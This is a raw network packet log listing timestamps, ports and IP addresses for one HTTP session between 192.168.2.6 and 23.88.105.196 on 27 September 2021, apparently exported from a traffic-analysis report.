Sep 27, 2021 18:33:09.162966013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162988901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163009882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163016081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163039923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163052082 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163084030 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163089037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163127899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163136005 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163157940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163177967 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163182020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163203001 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163206100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163228989 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163230896 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163255930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163264036 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163279057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163300991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163305044 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163324118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163347006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163350105 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163369894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163389921 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163392067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163415909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163425922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163441896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163464069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163466930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163491011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163507938 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163512945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163536072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163543940 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163558006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163579941 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163589954 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163604021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163629055 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163630009 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163655996 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163676977 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163697004 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163701057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163726091 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163752079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163755894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163779020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163805008 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163834095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163868904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163892031 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163913965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.163913965 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163944006 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163971901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.163989067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164012909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164035082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164035082 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164058924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164064884 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164083004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164103031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164104939 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164129972 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164151907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164154053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164177895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164181948 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164201975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164223909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164225101 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164247036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164264917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164271116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164298058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164339066 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.164438009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.164489985 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.171152115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.171314955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.265276909 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.268791914 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.287040949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.287075996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.287098885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.287144899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.287185907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289743900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289778948 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289802074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289813042 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289839983 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289856911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289869070 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289882898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289906979 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289911032 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289932966 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289953947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.289969921 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.289994955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290016890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290043116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290054083 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290086985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290118933 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290148020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290169001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290193081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290219069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290251017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290282011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290297031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290328026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290368080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290400982 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290407896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290422916 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290431023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290451050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290458918 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290482998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290488958 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290507078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290524960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290529966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290572882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290579081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290597916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290617943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290656090 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290731907 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290757895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290785074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290790081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290810108 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290818930 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290839911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290853977 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290900946 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.290939093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290965080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.290987015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.291008949 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.291009903 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.291037083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.291060925 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.291084051 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.311217070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.311302900 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.853228092 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.855588913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.104836941 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126363993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126399040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126415968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126434088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126451015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126471043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126483917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126490116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126554012 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126585007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126601934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126620054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126636982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126638889 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126658916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126663923 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126677036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126703024 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126739025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126895905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.126967907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.126986980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127006054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127022982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127033949 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127039909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127057076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127065897 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127078056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127095938 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127104998 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127145052 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127187967 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127232075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127235889 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127293110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127326965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127345085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127365112 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127372980 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127384901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127403021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127409935 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127419949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127445936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127454042 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127475977 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127513885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127537012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127556086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127573013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127583981 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127588987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127613068 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127616882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127634048 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127650023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127657890 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127667904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127684116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127705097 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127712965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127741098 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127774000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127810955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127829075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127846956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127857924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127890110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.127927065 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127945900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127963066 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.127979994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128004074 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.128012896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128030062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128038883 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.128048897 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128057003 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.128081083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128098011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128102064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.128129005 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.128149986 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.128176928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.147905111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.147939920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.147953033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.147965908 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.147984982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148001909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148017883 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148031950 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148035049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148085117 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148086071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148102045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148119926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148149967 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148175001 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148220062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148237944 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148255110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148273945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148287058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148329973 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148343086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148365021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148390055 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148426056 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148438931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148458958 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148473978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148504972 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148533106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148540974 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148580074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148586035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148600101 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148617983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148628950 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148637056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148653984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148660898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148670912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148700953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148727894 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148736954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148858070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148895025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148912907 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148936033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148936033 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.148956060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.148984909 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149018049 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149019957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149061918 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149079084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149096966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149121046 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149142027 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149148941 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149171114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149200916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149214029 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149218082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149235964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149252892 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149255991 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149274111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149285078 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149305105 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149322033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149326086 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149369001 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149405956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149451971 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149487019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149530888 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149593115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149609089 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149660110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149661064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149682999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149705887 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149727106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149746895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149748087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149765015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149772882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149796963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.149805069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149822950 CEST	80	49741	23.88.105.196	192.168.2.6
